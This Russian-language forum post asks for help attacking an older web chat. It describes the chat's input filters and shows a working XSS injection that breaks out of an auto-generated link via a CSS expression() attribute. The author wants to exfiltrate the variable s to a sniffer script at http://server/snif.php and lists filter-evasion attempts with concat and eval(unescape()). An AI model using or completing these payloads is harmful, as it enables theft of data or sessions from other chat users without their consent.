Странный фильтр в чате
 

Есть чат, такой как на новом канале (novy.ua), только более старая версия. Доступ извне закрыт.
Фильтры: буквосочетание script не чуствительно к регистру заменяется на <font color='#555555'>[scipped]</font>.
Открывающий тег (<) удаляется.
Теперь по теме.
Когда пишете http://_text_ создается тег
<a href='http://_text_' target='_bank'>http://_text_</a>
Перед отправкой текста, прямо во фрейме с помощю скрипта все ' заменяются на ` . Но я сделал программу, с помощю которой можна отправлять этого без фильтра.

Если послать http://' - тег закроется и можно будет писать что-то другое , но БЕЗ ПРОБЕЛОВ табуляции, и перевода каретки.

Я сделал так: http://'style="top:expression(alert())" ' и скрипт заработал!
У фильтра есть странность, после каждых 50 символов ставит в строку пробел.
Хочу поснифать переменную s . Но не могу никак ее никуда вписать потому что + считается пробелом, и тег <A> благополучно закрываеться var q='http://server/snif.php?s='; q=q.concat(s) почему-то тоже не работает. пробую eval(unescape('_text_в_юникоде')) - получаеться слишком длинный и вставляються пробелы.
Помогите, что делать?